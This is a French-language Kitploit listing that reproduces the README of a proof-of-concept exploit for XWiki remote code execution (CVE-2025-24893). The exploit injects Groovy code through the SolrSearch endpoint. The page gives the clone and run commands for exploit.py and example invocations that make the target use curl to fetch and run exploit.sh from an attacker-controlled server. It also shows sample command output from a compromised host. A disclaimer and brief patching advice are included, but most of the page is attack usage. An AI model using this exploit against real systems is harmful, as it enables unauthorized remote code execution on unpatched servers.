Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xwiki-cve-2025-24893-poc — PoC pour CVE-2025-24893 | Kitploit
Outils/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à Distance
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

PoC pour CVE-2025-24893

Voir le dépôt
314il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

XWiki – Preuve de concept (PoC) d'exploitation RCE (CVE-2025-24893)

Aperçu

Ce dépôt contient une preuve de concept (PoC) d'exploitation pour la vulnérabilité XWiki Remote Code Execution (RCE) identifiée sous la référence CVE-2025-24893. Cette vulnérabilité permet à un attaquant d'exécuter du code arbitraire sur une instance XWiki cible en exploitant une requête malveillante vers le point de terminaison SolrSearch. Ce script prend en charge les cibles HTTP et HTTPS.

⚠️ Avertissement : Cette PoC est destinée uniquement à des fins éducatives et de recherche. L'utilisation non autorisée de ce code contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant de tester un système.

Détails de la vulnérabilité

  • Identifiant CVE : CVE-2025-24893
  • Composant affecté : point de terminaison SolrSearch de XWiki
  • Impact : Exécution de code à distance (RCE)
  • Avis de sécurité : GitHub Security Advisory

La vulnérabilité provient d'une gestion incorrecte des entrées utilisateur dans le point de terminaison SolrSearch, permettant l'injection de code Groovy via une charge utile malveillante. Cette PoC montre comment un attaquant peut exploiter cela pour exécuter des commandes arbitraires sur le serveur cible.

Prérequis

  • Python 3.x
  • Bibliothèques Python requises : , , , ,
Télécharger l’outil
requests
argparse
urllib.parse
re
html
  • Une instance XWiki cible vulnérable à CVE-2025-24893
  • Un serveur contrôlé par l'attaquant pour héberger le script bash, accessible via HTTP ou HTTPS
  • Un fichier contenant le code à exécuter sur la cible
  • Installation

    1. Clonez ce dépôt :
      root@kitploit:~
      git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
      
    2. Installez les bibliothèques Python requises :
      root@kitploit:~
      pip install requests
      

    Utilisation

    Le script envoie une requête HTTP/HTTPS malveillante à l'instance XWiki cible, en injectant une charge utile Groovy qui exécute une commande curl pour récupérer et exécuter un fichier depuis un serveur contrôlé par l'attaquant.

    Exécutez le script avec la commande suivante :

    root@kitploit:~
    python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]
    

    Arguments

    • --url : L'URL de base de l'instance XWiki cible (par exemple, http://target ou https://target).
    • --server : L'adresse IP ou le nom d'hôte du serveur de l'attaquant, incluant le port si nécessaire (par exemple, 192.168.1.100:8080). Prend en charge HTTP et HTTPS.
    • --file : Le nom du fichier sur le serveur de l'attaquant contenant le code à exécuter (par exemple, exploit.sh).
    • --no-verify : Option facultative pour désactiver la vérification SSL pour les cibles HTTPS (à utiliser avec prudence, pour les tests uniquement).

    Exemple

    root@kitploit:~
    python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh
    

    Pour contourner la vérification SSL (par exemple, pour les certificats auto-signés) :

    root@kitploit:~
    python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
    

    Cela permettra de :

    1. Construire une charge utile qui utilise le script Groovy pour exécuter une commande curl.
    2. Récupérer le fichier spécifié (exploit.sh) depuis le serveur de l'attaquant (http(s)://192.168.1.100:8080).
    3. Exécuter le fichier récupéré sur le système cible.
    4. Extraire et afficher la sortie, en nettoyant les balises et entités HTML.

    Sortie

    Le script extrait la réponse de la cible, supprime les balises HTML (par exemple, <br/>, <del>) et convertit les entités HTML en texte brut pour une meilleure lisibilité. La sortie nettoyée est affichée dans la console.

    Exemple

    root@kitploit:~
    python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
    uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
    

    Limitations

    • L'instance XWiki cible doit être vulnérable à CVE-2025-24893.
    • Le serveur de l'attaquant doit être accessible depuis le système cible via HTTP ou HTTPS.
    • Le script suppose que le serveur cible prend en charge le point de terminaison SolrSearch et l'exécution Groovy.

    Mesures d'atténuation

    Pour se protéger contre cette vulnérabilité :

    • Mettre à jour XWiki vers la dernière version corrigée.
    • Consultez le GitHub Security Advisory pour des étapes d'atténuation détaillées.
    • Blog de référence : CVE-2025-24893

    Licence

    Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.